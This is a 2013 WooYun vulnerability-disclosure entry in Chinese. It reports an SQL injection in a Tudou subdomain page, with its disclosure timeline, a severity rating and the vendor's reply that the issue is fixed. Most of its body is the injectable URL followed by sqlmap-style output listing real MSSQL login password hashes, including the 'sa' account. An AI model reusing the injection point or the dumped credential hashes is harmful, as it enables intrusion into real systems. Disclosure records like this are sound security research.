乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-08-30: 细节已通知厂商并且等待厂商处理中 2013-08-31: 厂商已经确认,细节仅向厂商公开 2013-09-10: 细节向核心白帽子及相关领域专家公开 2013-09-20: 细节向普通白帽子公开 2013-09-30: 细节向实习白帽子公开 2013-10-14: 细节向公众公开
注入怪物来了!
注入地址:http://whitevitality.tudou.com/usercontrols/uc_videosingle.aspx?store_id=5401country=l06&type=M&class=M04
database management system users password hashes:[*] ##MS_PolicyEventProcessingLogin## [1]: password hash: 0x01003869d680adf63db291c6737f1efb8e4a481b02284215913f header: 0x0100 salt: 3869d680 mixedcase: adf63db291c6737f1efb8e4a481b02284215913f[*] ##MS_PolicyTsqlExecutionLogin## [1]: password hash: 0x01008d22a249df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f header: 0x0100 salt: 8d22a249 mixedcase: df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f[*] distributor_admin [1]: password hash: 0x0100f48bf5f4f43c513efc3cb12ca62117f012a9335d9e84887b header: 0x0100 salt: f48bf5f4 mixedcase: f43c513efc3cb12ca62117f012a9335d9e84887b[*] FunMovie [1]: password hash: 0x0100532784ebdd98657b645dcc279c5e3bb5d70e7a561ea40094 header: 0x0100 salt: 532784eb mixedcase: dd98657b645dcc279c5e3bb5d70e7a561ea40094[*] lion [1]: password hash: 0x01000d9bedfd1958fdb811cc5c5dfa7efae80d25113d3a925c4d header: 0x0100 salt: 0d9bedfd mixedcase: 1958fdb811cc5c5dfa7efae80d25113d3a925c4d[*] momait2 [1]: password hash: 0x01001fb74c20ccac52636e0da59cf86c435e5f7ece7fb13e8d87 header: 0x0100 salt: 1fb74c20 mixedcase: ccac52636e0da59cf86c435e5f7ece7fb13e8d87[*] momait4 [1]: password hash: 0x010086cdfaf8a5bc7503b6c969ad75636c904e5c240b368e57cc header: 0x0100 salt: 86cdfaf8 mixedcase: a5bc7503b6c969ad75636c904e5c240b368e57cc[*] sa [1]: password hash: 0x010056049b0ea82de135ddd10e3772090a673599c95ff8f3a421 header: 0x0100 salt: 56049b0e mixedcase: a82de135ddd10e3772090a673599c95ff8f3a421
防注入
危害等级:中
漏洞Rank:5
确认时间:2013-08-31 13:36
之前合作项目,已处理,多谢。
暂无